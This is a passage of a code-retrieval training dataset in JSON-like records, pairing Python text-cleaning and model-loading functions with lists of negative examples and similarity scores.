clean_up(sentence):\n\treturn unicode(sentence.strip().replace(\"\\n\", \"\"), errors='ignore').strip().replace(\"\\x0c\", \"\")", "def remove_punctuation(a_string):\r\n return a_string.translate(str.maketrans(\"\", \"\", string.punctuation))", "def remove_punctuation(input_string):\r\n return ''.join([c for c in input_string if c not in punctuation])", "def clean(s: str) -> str:\n translator = str.maketrans(\"\", \"\", string.punctuation)\n return s.translate(translator)", "def _clean_text(text):\n rrb = re.compile(\"-RRB-\")\n lrb = re.compile(\"-LRB-\")\n new_text = re.sub(rrb, \" \", text)\n new_text = re.sub(lrb, \" \", new_text)\n\n punct = re.compile(r'[_?!.,]')\n new_text = re.sub(punct, \" \", new_text)\n\n new_text = str(new_text).lower()\n return new_text" ]
[ "0.8042368", "0.7765066", "0.7309863", "0.729243", "0.72679365", "0.7266738", "0.7264455", "0.72357666", "0.7194123", "0.719088", "0.7137011", "0.7126668", "0.7068454", "0.7044288", "0.7034183", "0.70212454", "0.70147127", "0.6998983", "0.6979322", "0.69668394", "0.6941041", "0.6935475", "0.6921085", "0.69145447", "0.6914504", "0.68904227", "0.6876783", "0.686085", "0.6849957", "0.6846275", "0.68142945", "0.6799121", "0.67655903", "0.6763929", "0.67404866", "0.6738909", "0.6730366", "0.6721199", "0.67078465", "0.6704854", "0.6700549", "0.6684403", "0.66767436", "0.66758144", "0.66715115", "0.6653292", "0.66450983", "0.6607567", "0.6607456", "0.6586212", "0.65774554", "0.6566724", "0.6523078", "0.6522571", "0.65159684", "0.65106595", "0.6493691", "0.64723366", "0.6469624", "0.6469624", "0.6457123", "0.64514863", "0.64471996", "0.64305735", "0.642868", "0.6424516", "0.64143807", "0.64143807", "0.64081943", "0.64081943", "0.64081943", "0.64081943", "0.64081943", "0.64081943", "0.6405743", "0.64027226", "0.63784117", "0.6378021", "0.63771963", "0.63710827", "0.6366633", "0.63604695", "0.63604695", "0.6351612", "0.6341843", "0.63376963", "0.63362634", "0.63351184", "0.6335103", "0.6335103", "0.63257647", "0.6321472", "0.63199055", "0.63198954", "0.6317264", "0.63161486", "0.63053197", "0.6305056", "0.6295264" ]
0.7302177
4
Clear the text of any characters that would prevent matching words with regex. These include special punctuation, bullet points, new lines, etc.
def clean_text_from_nonbasic_characters(text):
    text = re.sub(r"([^\u0000-\u007F])", " ", text)
    text = replace_newline_with_space(text).strip()
    text = text.replace("_", "")
    text = clean_text_from_multiple_consecutive_whitespaces(text)
    return text
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def CLEAN(text):\n return _control_char_re.sub('', text)", "def removeSpecialChars(self) -> None:\n self.text = re.sub('[^a-zA-z0-9\\n\\.\\s]', '', self.text)", "def remove_non_alphabetic_text(text):\n return RegexFilters.replace_non_alphabetic_text(text, \"\")", "def remove_punctations_fun(self): \n self.doc = re.sub('[^a-zA-Z0-9]', ' ', self.doc)", "def _clean(self, text):\n if len(self.alph) == 26:\n text = sub('[\\n\\t ' + string.punctuation + ']+?', '', text)\n else:\n text = sub('[\\n\\t]+?', '', text)\n\n text = text.lower()\n text = text.encode('ascii', 'ignore').decode()\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def clean_text ( self, text ) :\n text = BeautifulSoup ( text , \"lxml\" ).text # HTML decoding\n text = text.lower ( ) # lowercase text\n text = REPLACE_BY_SPACE_RE.sub ( ' ' , text ) # replace REPLACE_BY_SPACE_RE symbols by space in text\n text = BAD_SYMBOLS_RE.sub ( '' , text ) # delete symbols which are in BAD_SYMBOLS_RE from text\n text = ' '.join ( word for word in text.split ( ) if word not in STOPWORDS ) # delete stopwors from text\n return text", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or _is_control(char):\n continue\n if _is_whitespace(char):\n 
output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def remove_special_characters_from_text(text) -> str:\n return re.sub(r'[^\\w\\s]', '', text.strip())", "def remove_inner_word_characters(text):\n return RegexFilters.replace_inner_word_characters(text, \"\")", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xFFFD or _is_control(char):\n continue # pragma: no cover\n if _is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def _clean_text(self, text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 65533 or _is_control(char):\n continue\n if _is_whitespace(char):\n output.append(' ')\n else:\n output.append(char)\n return ''.join(output)", "def _remove_special_chars(self, text: str) -> str:\n pattern = re.compile(self.special_chars_pattern)\n text = re.sub(pattern, \" \", text)\n return text", "def non_letter_removal(text):\n return re.sub('[^a-zA-Z]', ' ', text)", "def remove_punct(self,text):", "def _remove_custom_chars(self, text: str) -> str:\n patterns = \"|\".join([x for x in self.custom_chars])\n return re.sub(patterns, \"\", str(text), flags=re.IGNORECASE)", "def clean_text(text):\n text = text.lower()\n text = re.sub(r\"i'm\", 'i am', text)\n text = re.sub(r\"he's\", 'he is', text)\n text = re.sub(r\"she's\", 'she is', text)\n text = re.sub(r\"that's\", 'that is', text)\n text = re.sub(r\"what's\", 'what is', text)\n text = re.sub(r\"where's\", 'where is', text)\n text = re.sub(r\"\\'ll\", ' will', text)\n text = re.sub(r\"\\'ve\", ' have', text)\n text = re.sub(r\"\\'re\", ' are', text)\n text = re.sub(r\"\\'d\", ' would', text)\n text = re.sub(r\"won't\", 'will not', text)\n text = re.sub(r\"can't\", 'cannot', text)\n text = re.sub(r\"[-()\\\"#/@;:<>{}+=~|.?,]\", '', text)\n return text", "def cleanText_letters(text):\n text = re.sub(r\"emoji_(\\w+)\", r\" \", text)\n text = re.sub(r\"hashtag_(\\w+)\", r\" \", text)\n text = re.sub(r\"specialmentioned\", r\" \", text)\n text = re.sub(r\"specialurl\", r\" \", text)\n text = re.sub(\"\\s+\", \" \", text).lower().strip() \n\n if text == \" \" or text == \"\":\n return \"blank_comment\"\n else:\n return text \n \n return text", "def clean_text(text):\n text = re.sub(r\"[^A-Za-z0-9(),!?\\'\\`]\", \" \", text)\n text = re.sub(r\"\\'s\", \" \\'s\", text)\n text = re.sub(r\"\\'ve\", \" \\'ve\", text)\n text = re.sub(r\"n\\'t\", \" n\\'t\", text)\n text = re.sub(r\"\\'re\", \" \\'re\", text)\n text = re.sub(r\"\\'d\", \" \\'d\", text)\n text = re.sub(r\"\\'ll\", \" \\'ll\", text)\n text = re.sub(r\",\", \" , \", text)\n text = re.sub(r\"!\", \" ! \", text)\n text = re.sub(r\"\\(\", \" \\( \", text)\n text = re.sub(r\"\\)\", \" \\) \", text)\n text = re.sub(r\"\\?\", \" \\? 
\", text)\n text = re.sub(r\"\\s{2,}\", \" \", text)\n return text.strip().lower()", "def desc_cleanser(self, txt):\n # New line issues\n txt = re.sub(r'\\\\n', r' ', txt)\n # Unicode cleanse\n txt = re.sub(r'\\\\u[\\d]{4}', r'', txt)\n # Remaining unicode cleanse\n txt = re.sub(r'\\\\{1,2}\\S+', r' ', txt)\n # Remove remaining non-alphanumeric and spaces\n txt = ''.join([i for i in txt if i.isalnum() or i.isspace() or i in ['.','?','!']])\n # Remove more than a single space\n txt = re.sub(r'\\s+', r' ', txt)\n\n return txt", "def _clean_text(text):\n rrb = re.compile(\"-RRB-\")\n lrb = re.compile(\"-LRB-\")\n new_text = re.sub(rrb, \" \", text)\n new_text = re.sub(lrb, \" \", new_text)\n\n punct = re.compile(r'[_?!.,]')\n new_text = re.sub(punct, \" \", new_text)\n\n new_text = str(new_text).lower()\n return new_text", "def clean_text(text):\n output = []\n for char in text:\n cp = ord(char)\n if cp == 0 or cp == 0xfffd or is_control(char):\n continue\n if is_whitespace(char):\n output.append(\" \")\n else:\n output.append(char)\n return \"\".join(output)", "def text_cleaning(self, text):\n # remove string formatting '\\n' or '\\t'\n tmp_text = re.sub(r'\\n+', '. ', text)\n tmp_text = re.sub(r'\\t+', '. ', text)\n # remove words with non-ascii characters\n tmp_text = \" \".join([word for word in tmp_text.split() if self.is_ascii(word)])\n # remove email address\n tmp_text = \" \".join([word for word in tmp_text.split() if not word.startswith(\"@\")])\n # remove urls\n tmp_text = re.sub(r'http\\S+', '', tmp_text, flags=re.MULTILINE)\n tmp_text = re.sub(r'www\\S+', '', tmp_text, flags=re.MULTILINE)\n # remove punctuation but . (to split sentences)\n cleaned_text = re.sub('[^A-Za-z.,]+', ' ', tmp_text)\n # lowercase\n cleaned_text = cleaned_text.lower()\n\n return cleaned_text", "def clean_text(data):\r\n data = data.replace('\\n', ' ') #remove new lines\r\n replace_l = [\"'\",'!','/','\\\\','=',',',':', '<','>','?','.','\"',')','(','|','-','#','*','+', '_'] #list of characters to remove\r\n data = data.lower() #Convert all the words to lower case\r\n for i in replace_l:\r\n data = data.replace(i,' ') #replace words with blank character\r\n return data #return clean data\r", "def clean_text(self, text):\n return \"\".join((self.SP_CHAR_MAPPING.get(c, c) for c in text))", "def clean_text(text):\n text = text.lower()\n all_letters = \"abcdefghijklmnopqrstuvwxyz\"\n text_to_keep = \"\"\n for char in text:\n if char in all_letters:\n text_to_keep += char\n return text_to_keep", "def replace_any_non_letter_or_number_character(text):\n text = text.strip()\n text = re.sub('[^A-Za-z0-9 ]+', '', text)\n return text", "def clean_text(txt):\n\n cleaned_txt = ''\n for character in txt:\n if character not in 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVQXWY ': #punctuation\n character = ''\n cleaned_txt += character\n elif character == character.upper(): #uppercase\n character = character.lower()\n cleaned_txt += character\n else:\n cleaned_txt += character\n return cleaned_txt", "def _text_remove_s(all_text):\n\t# on n'agit que s'il y a au moins un cara plein\n\t\t# => pas les elts vides, ni \\s dont saut de ligne\n\tif len(all_text) and search('[^\\s]', all_text, flags=MULTILINE):\n\t\tflat_alltext = sub(r'\\n', '¤', all_text, flags=MULTILINE)\n\t\tflat_alltext = sub(r'[¤\\s]+$', '', flat_alltext)\n\t\tflat_alltext = sub(r'^[¤\\s]+', '', flat_alltext)\n\telse:\n\t\tflat_alltext = ''\n\treturn flat_alltext", "def _cleanse(text):\n return ''.join([character for character in text\n if 
character.isalnum()]).lower()", "def clean_text(text):\n new_text = \"\"\n text = text.lower()\n for character in text:\n if character.isalpha():\n new_text = new_text + character\n return new_text", "def remove_special_chars(text):\n \n text = re.sub(' +', ' ', re.sub('[^A-Za-z ]+', ' ', text).strip())\n return text", "def remove_special_characters(text):\n soup = BeautifulSoup(text, \"html.parser\")\n review = soup.get_text()\n review = r\"[^a-zA-z0-9\\s]\"\n review = re.sub(review, \"\", text)\n return review.lower()", "def clean(text):\n\n # removing paragraph numbers\n text = re.sub('[0-9]+.\\t', '', str(text))\n # removing new line characters\n text = re.sub('\\n ', ' ', str(text))\n text = re.sub('\\n', ' ', str(text))\n # removing apostrophes\n text = re.sub(\"'s\", '', str(text))\n # removing hyphens\n text = re.sub(\"-\", '', str(text))\n text = re.sub(\"— \", '', str(text))\n # removing quotation marks\n text = re.sub('\\\"', '', str(text))\n # removing salutations\n text = re.sub(\"Mr\\.\", 'Mr', str(text))\n text = re.sub(\"Mrs\\.\", 'Mrs', str(text))\n # removing any reference to outside text\n text = re.sub(\"[\\(\\[].*?[\\)\\]]\", \"\", str(text))\n\n return text", "def clean_text(text):\n\n\n regex = re.compile('[\\.|\\-|\\,|\\?|\\_|\\:|\\\"|\\)|\\(\\)\\/|\\\\|\\>|\\<]')\n text = text.lower() # Turn everything to lower case\n text = regex.sub(' ', text).strip()\n out = re.sub(' +', ' ', text) # Reduce whitespace down to one\n \n return out", "def clean_the_text(text):\n \n #Replace non-word characters with empty space\n text = re.sub('[^A-Za-z0-9\\s]', ' ', text)\n \n #Remove punctuation\n text = ''.join([word for word in text if word not in string.punctuation])\n \n #Bring text to lower case\n text = text.lower()\n \n #Tokenize the text\n tokens = re.split('\\W+', text)\n \n #Remove stopwords\n text = [word for word in tokens if word not in stopword]\n \n #Lemmatize the words\n text = [wn.lemmatize(word) for word in text]\n \n #Return text\n return text", "def remove_diacritics(self, text):\n text = re.sub(self._arabic_diacritics, '', text)\n return text", "def clean_text(text):\n text = text.lower()\n text = text.replace('\\xa0', ' ')\n text = text.replace('fls.', 'folhas ')\n text = text.replace('fl.', 'folha ')\n text = text.replace('arts.', 'artigos ')\n text = text.replace('art.', 'artigo ')\n text = re_tree_dots.sub('...', text)\n text = re.sub(r'\\.\\.\\.', ' ', text)\n text = re_remove_brackets.sub(' ', text)\n text = re_changehyphen.sub('-', text)\n text = re_remove_html.sub(' ', text)\n text = re_transform_numbers.sub('0', text)\n text = re_transform_url.sub('URL', text)\n text = re_transform_emails.sub('EMAIL', text)\n text = re_quotes_1.sub(r'\\1\"', text)\n text = re_quotes_2.sub(r'\"\\1', text)\n text = re_quotes_3.sub('\"', text)\n text = re.sub('\"', ' ', text)\n text = re_dots.sub('.', text)\n text = re_punctuation.sub(r'\\1', text)\n text = re_hiphen.sub(' - ', text)\n text = re_punkts.sub(r'\\1 \\2 \\3', text)\n text = re_punkts_b.sub(r'\\1 \\2 \\3', text)\n text = re_punkts_c.sub(r'\\1 \\2', text)\n text = re_doublequotes_1.sub('\\\"', text)\n text = re_doublequotes_2.sub('\\'', text)\n text = re_trim.sub(' ', text)\n return text.strip()", "def clean_text(text):\n text = str(text).lower()\n text = text.strip(string.punctuation)\n text = re.sub(\"&amp;\", '', text)\n text = re.sub(\"https\", '', text)\n text = re.sub('\\W\\s', '', text)\n text = re.sub('\\s,\\W', '', text)\n text = re.sub('[.!@#$%^&*()_,:;/-]', '', text)\n text = re.sub(\"\\d+\", '', 
text)\n\n return text", "def _strip_text(text):\n text = re.sub(r'[ ,?:]|%s', \"\", text.lower())\n for chr in \"-%\":\n new_text = text.replace(chr, \"\")\n if new_text:\n text = new_text\n return text.lower()", "def clean_text(text):\n global cleaned_text\n # remove numbers\n text_nonum = re.sub(r'\\d+', '', text)\n # remove punctuations and convert characters to lower case\n text_nopunct = \"\".join([char.lower() for char in text_nonum if char not in string.punctuation]) \n # substitute multiple whitespace with single whitespace\n # Also, removes leading and trailing whitespaces\n text_no_doublespace = re.sub('\\s+', ' ', text_nopunct).strip()\n #tokenise text\n tokenised_text = text_no_doublespace.split()\n for word in tokenised_text:\n if len(word) == 1:\n tokenised_text.remove(word)\n #if word is a stop word, remove it from the list\n elif word in stopwords.words('english'):\n tokenised_text.remove(word)\n #de-tokenise text\n cleaned_text = ' '.join(tokenised_text)\n return cleaned_text", "def clean_text(text):\n text = text.replace(\"\\uf0b7\", \" \")\n text = text.replace(\":\", \" \")\n text = text.replace(\".\", \" \")\n text = text.replace(\",\", \" \")\n text = text.replace(\"/\", \" \")\n text = text.replace(\"(\", \" \")\n text = text.replace(\")\", \" \")\n text = text.replace(\"[\", \" \")\n text = text.replace(\"]\", \" \")\n text = text.replace(\"+\", \" \")\n text = text.replace(\"?\", \" \")\n text = text.replace(\"*\", \" \")\n text = text.replace(\"#\", \" \")\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n text = re.sub(\" $\", \"\", text)\n return text", "def remove_non_alpha(self,text):\n \n removelist=\"-\\.\\/\\?\\@\"\n re_alpha_numeric1=r\"[^0-9a-zA-Z\"+removelist+\" ]\"\n clean_text=re.sub(re_alpha_numeric1,'',text)\n clean_text=clean_text.replace('/',' ')\n clean_text=re.sub(' +', ' ', clean_text)\n return clean_text", "def clean_text(txt):\n\n for symbol in \"\"\".,'?!()/-:;\"\"\":\n txt = txt.replace(symbol, '')\n txt = txt.lower()\n txt = txt.split()\n return txt", "def remove_nonalpha(text):\n text = ''.join(c for c in text if c.isalpha() or c == ' ')\n return re.sub(\" +\", \" \", text)", "def strip(self, str_text):\n punct_chars = [' ', '.', ',', '!', '?', '&', '\"', \"'\", '-', ':']\n str_text = [i for i in str_text if i not in punct_chars]\n str_text = ''.join(str_text)\n return str_text", "def clean_text(text):\n text = text.lower() # Convert the text to lower case\n text = re.sub(\",\", \" \", text) # Replace commas with an extra space\n\n text = re.sub(\"<.*?>\", \"\", text) # Clean out any HTML tags\n text = re.sub(\"\\s+\", \" \", text) # Replace multiple spaces with\n\n text = text.split()\n\n text = [\n re.sub(\"[^\\w]\", \"\", i.rstrip()) for i in text if i not in all_stopwords\n ] # Clean out stopwords\n\n # text = engStem.stemWords(text)# English Stemming\n\n text = \" \".join(text)\n return text", "def remove_special_chars(text):\n schars = ''.join([a for a in string.punctuation if a not in \".,?\"])\n\n text = re.sub('[%s]' % re.escape(schars), '', text)\n return text", "def remove_spurious_words(text):\n spurious_words = [\"Cached\", \"Similar\", '的']\n for word in spurious_words:\n text = text.replace(word, \"\")\n return re.sub('[.、”“::a-zA-Z%?=()()—「 /-]', ' ', text)", "def remove_special_characters(text, remove_digits=False):\n pattern = r'[^a-zA-z0-9\\s]' if not remove_digits else r'[^a-zA-z\\s]'\n text = re.sub(pattern, '', text)\n return text", "def clean(text):\n return re.sub(REGEX, \"\", text).strip() + 
\"\\n\"", "def sanitize_text(text: str) -> str:\n for r in [RE_NOISE, RE_EMAIL, RE_REFERENCE]:\n text = r.sub(\"\", text)\n return text", "def sanitize(text):\n #text = re.sub(r'[*]',r'\\*',text) \n text = re.sub(r'~',r'\\~',text) \n #text = re.sub(r'<',r'\\textless',text) \n #text = re.sub(r'>',r'\\textgreater',text) \n text = re.sub(r'\\|',r'\\|',text) \n text = re.sub(r'_',r'\\\\_',text) \n return text", "def removePunctuation(text):\n return re.sub(r'[^A-Za-z0-9 ]', ' ', text).strip()", "def clean_text(content):\n bad_chars = [\n \"<i>\",\n \"</i>\",\n \"<br />\",\n \"<b>\",\n \"</b>\",\n \"<\",\n \">\",\n \"\\\\\"\n ]\n\n for char in bad_chars:\n if char in content:\n content = content.replace(char, \"\")\n return content", "def remove_noise(text):\n text1 = re.sub(\"[\\t\\r\\s]\", \" \",text)\n text1 = \" \" + text1\n text2 = re.sub(r\"([ \" + string.punctuation + \"]+)[^a-zA-Z ]+\", \"\\g<1> \", text1)\n return text2", "def remove_punctuation(text):\n text = re.sub(r'[^\\w\\s]', ' ', text)\n return text", "def remove_punctuation(text):\n return re.sub(r'[^\\w]', ' ', text)", "def cleanText(text):\n try:\n text = str(text)\n\n # remove contactions and stop words\n text = contractions(text)\n # remove html entities\n cleanr = re.compile('<.*?>|&([a-z0-9]+|#[0-9]{1,6}|#x[0-9a-f]{1,6});')\n new_text = cleanr.sub('', text.strip())\n return re.sub(r'\\s+', ' ', re.sub(r'\\W+', \" \", new_text))\n # TAG_RE = re.compile(r'<[^>]+>')\n except:\n print(\"An exception occurred with: \" + text)\n return str(text)", "def clean(word):\n word = word.lower()\n stopwords = ['of', 'and','to', 'at', 'in', '@']\n word = re.sub(r'[\\&/\\-\\(\\)\\|\\@,\\]\\[]+', ' ', word)\n for stopword in stopwords:\n pattern = r'\\b' + stopword + r'\\b'\n pattern = re.compile(pattern)\n word = re.sub(pattern, '', word)\n word = re.sub(r'\\s\\s+', ' ', word)\n return word", "def text_prepare(text):\r\n\r\n replace_by_space_re = re.compile('[/(){}\\[\\]\\|@,;]')\r\n good_symbols_re = re.compile('[^0-9a-z #+_]')\r\n stopwords_set = set(stopwords.words('english'))\r\n\r\n text = text.lower()\r\n text = replace_by_space_re.sub(' ', text)\r\n text = good_symbols_re.sub('', text)\r\n text = ' '.join([x for x in text.split() if x and x not in stopwords_set])\r\n\r\n return text.strip()", "def _replace_non_alnum(self):\n no_punct = [x if x.isalnum() else ' ' for x in self._phrase.lower()]\n return ''.join(no_punct) # Convert an array of char to string", "def clean_text(text):\n return(re.sub(\" {2,}|\\r|\\n\",\"\", text))", "def scrub_words(text):\n \"\"\"Taken from https://github.com/kavgan/nlp-in-practice/blob/master/text-pre-processing/Text%20Preprocessing%20Examples.ipynb \"\"\"\n \n # remove html markup\n text=re.sub(\"(<.*?>)\",\"\",text)\n \n #remove non-ascii and digits\n text=re.sub(\"(\\\\W|\\\\d)\",\" \",text)\n \n # remove the extra spaces that we have so that it is easier for our split :) Taken from https://stackoverflow.com/questions/2077897/substitute-multiple-whitespace-with-single-whitespace-in-python\n text=re.sub(' +', ' ', text).strip()\n return text", "def remove_special_char(self,text):\n modified_text = re.sub(',|;|#,$','',text)\n return modified_text", "def clear_punctuation(document):\n return re.sub(r'\\D', '', str(document))", "def remove_punctuation(text):\n return re.sub('[,.?\";:\\-!@#$%^&*()]', '', text)", "def clean_text_for_skill_extraction(text):\n multi_space_regex = re.compile(r\"[,;?!()\\\\/]\", re.IGNORECASE)\n text = re.sub(multi_space_regex, ' ', text)\n\n text = 
clean_text_from_private_unicode(text)\n text = clean_text_from_geometrical_shape_unicode(text)\n\n text = clean_text_from_multiple_consecutive_whitespaces(text)\n\n return text", "def punct_remove(text):\n return(re.sub(punct_characters,' ',text))", "def get_clean_text(messy_text: str) -> str:\n new_text = \"\"\n replace = {\n \"*\": \"\\\"\",\n \"!\": \"?\",\n \"/\": ',',\n \"?\": \"!\"\n }\n remove = \"1234567890&@#$%^()_+|><~\"\n pls_do_upper = False\n for l in messy_text:\n if l in replace:\n new_text += replace[l]\n elif l not in remove:\n if pls_do_upper:\n new_text += l.upper()\n else:\n new_text += l\n return new_text", "def clean_text(text: Any) -> str:\n return textwrap.dedent(str(text)).strip()", "def clean_text_from_general_punctuation_unicode(text):\n return re.sub(r\"([\\u2000-\\u206F])\", \" \", text)", "def clean_text_from_general_punctuation_unicode(text):\n return re.sub(r\"([\\u2000-\\u206F])\", \" \", text)", "def remove_punctuation(text):\n bad_characters = [\".\", \",\", \";\", \"!\", \"?\", \":\", \"(\", \")\", \"-\", \"/\", \"*\",\n \"' \", \" '\", '\"', \"&\"]\n for bad_character in bad_characters:\n text = text.replace(bad_character, \"\")\n return text.lower()", "def _remove_special_chars(self, doc: str):\n processed_tweet = re.sub('[\\.,!#¡\\?¿%:;´\"@”“&()\\|]', '', doc)\n return processed_tweet", "def _clean(text, remove_stopwords=False):\n text = _remove_between_square_brackets(text)\n text = _replace_contractions(text)\n \n words = nltk.word_tokenize(text)\n words = _remove_non_ascii(words)\n words = _to_lowercase(words)\n words = _remove_punctuation(words)\n words = _replace_numbers(words)\n\n if remove_stopwords:\n words = _remove_stopwords(words)\n\n return ' '.join(words)", "def clean_word(self, word):\n return self.filter_pattern.sub(u'', word.lower())", "def _remove_left_padded_special_chars(self, text: str) -> str:\n pattern = re.compile(\"\\ +[^A-Za-z0-9\\n]\")\n text = re.sub(pattern, \" \", text)\n return text", "def remove_apostrophes(text: str) -> str:\n apostrophes_re = re.compile(\"'\")\n return apostrophes_re.sub(' ', text)", "def remove_punctuation(self):\n new_words = []\n # new_words = \"\"\n for word in self.words:\n new_word = re.sub(r'[^\\w\\s]', '', word)\n if new_word != '':\n new_words.append(new_word)\n # new_words += f\"{new_word} \"\n self.words = new_words\n return self", "def clean_text(text):\n return text.replace('\\n', ' ').replace('\\r', ' ')", "def remove_tokens(self, text):\r\n\r\n return text.replace(self.PAD_TK, \"\").replace(self.UNK_TK, \"\")", "def cleanString(self, s):\r\n s = s.lower()\r\n for x in s: \r\n if x in punctuation:\r\n s = s.replace(x, '')\r\n return s", "def _remove_diacritics(self, text: str) -> str:\n nfkd_form = unicodedata.normalize(\"NFKD\", text)\n return \"\".join([char for char in nfkd_form if not unicodedata.combining(char)])", "def clean_text(txt):\n\n alphabet= 'abcdefghijklmnopqrstuvwxyz '\n\n ALPHABET= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ '\n\n new_words=''\n \n for i in txt:\n if i in alphabet or i in ALPHABET:\n new_words+= i\n\n clean=new_words.lower().split()\n\n return clean", "def clean_training_text(txt):\n return re.sub('[^A-Za-z0-9]+', ' ', str(txt)).strip()", "def CleanText(text):\n\n pretty_issue = text.lower().strip()\n\n quoteless_issue = re.sub('\\'', '', pretty_issue)\n no_punctuation_issue = re.sub('[^\\w\\s]|_+', ' ', quoteless_issue)\n one_space_issue = ' '.join(no_punctuation_issue.split())\n\n return one_space_issue", "def clean_text(some_text):\n # import re\n some_clean_text = 
re.sub(r'\\n|\\t', '', some_text) # Remove new line and tabs\n some_clean_text = re.sub(' +', ' ', some_clean_text) # Replace multiple spaces with one space\n return some_clean_text", "def removeNonAsciiFromText(self, text):\n\t\treturn ''.join([i if ord(i) < 128 else '' for i in text])", "def _clean(self, texts, no_punc=False):\n result = ''\n sw = self._sw_no_punc_dict if no_punc else self._sw_dict\n for t in texts:\n if t not in sw:\n result += t\n return result", "def clean_word(word: str) -> str:\n\n cleaned_word = ''\n for char in word.lower():\n if char.isalnum():\n cleaned_word = cleaned_word + char\n return cleaned_word", "def clean_review(self, text):\n text = text.lower() # lowercase capital letters\n\n if self.remove_stopwords:\n text = self.remove_stopwords_f(text, keep_neg_words=True)\n\n text = re.sub('[^a-zA-Z]+', ' ', text) # select only alphabet characters (letters only)\n # text = re.sub('[^a-zA-Z0-9]+', ' ', text) # select only alphanumeric characters (letters & numbers)\n # text = re.sub(r'\\W+', ' ', text) # Select only alphanumeric characters (including greek & underscore)\n\n text = re.sub(' +', ' ', text) # remove extra spaces\n\n if self.apply_normalization:\n text = self.normalize_text(text)\n\n return text", "def remove_puncts(text):\n # regex rocks\n #return re.sub('[%s]'%PUNCTS, ' ', text)\n return REMOVE_PUNCTS_RE.sub(' ', text)", "def clean_up_text(text):\n text = html.unescape(text)\n return remove_emoji(text)", "def removeApostrophes(self, words):\n\t\treturn self.__apostropheRegex.sub('', words)" ]
[ "0.788221", "0.77547354", "0.76948416", "0.7690904", "0.76164234", "0.76150995", "0.76150995", "0.76150995", "0.76150995", "0.76150995", "0.76150995", "0.75909275", "0.7558085", "0.7538756", "0.75204813", "0.75020224", "0.74994344", "0.7429214", "0.73992103", "0.73870385", "0.73750395", "0.736514", "0.7348014", "0.7343082", "0.73056155", "0.72943497", "0.7290857", "0.7284003", "0.7243742", "0.7229692", "0.72105587", "0.71983653", "0.71956676", "0.7195185", "0.7194841", "0.71887636", "0.71755725", "0.7123536", "0.7107823", "0.71029174", "0.71013856", "0.70503026", "0.70256656", "0.7017799", "0.7014829", "0.7005056", "0.69955915", "0.6986028", "0.6972711", "0.69688404", "0.69649935", "0.69369334", "0.6933182", "0.6931206", "0.6930173", "0.6917457", "0.6885875", "0.68855447", "0.6883252", "0.6872537", "0.68484724", "0.6832282", "0.68273264", "0.6825463", "0.6823997", "0.6818732", "0.6817686", "0.6811743", "0.6803135", "0.68009484", "0.6793261", "0.67824864", "0.678108", "0.6777722", "0.67756706", "0.67713076", "0.67713076", "0.6760601", "0.6746043", "0.6714406", "0.6711266", "0.6705661", "0.6696278", "0.6687402", "0.66814876", "0.6666233", "0.66657925", "0.66653633", "0.66624296", "0.66243494", "0.6619843", "0.6619", "0.6574183", "0.6573485", "0.6564896", "0.65640604", "0.65427446", "0.65407133", "0.6527284" ]
0.72454876
29
Returns a scikit-learn style model/pipeline
def get_model(name):
    try:
        from .model_defs import get_model_from_def
        model = get_model_from_def(name)
        logger.info("Model {n} loaded from model_defs module".format(n=name))
    except NameError:
        try:
            model = get_model_from_yaml(name)
            logger.info("Model {n} loaded from yaml".format(n=name))
        except KeyError:
            try:
                from .model_defs import parse_model_name
                model = parse_model_name(name)
                logger.info("Model {n} parsed from name".format(n=name))
            except NameError:
                sys.exit("Unknown model {n}".format(n=name))
    if not hasattr(model, 'name'):
        model.name = name
    return model
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
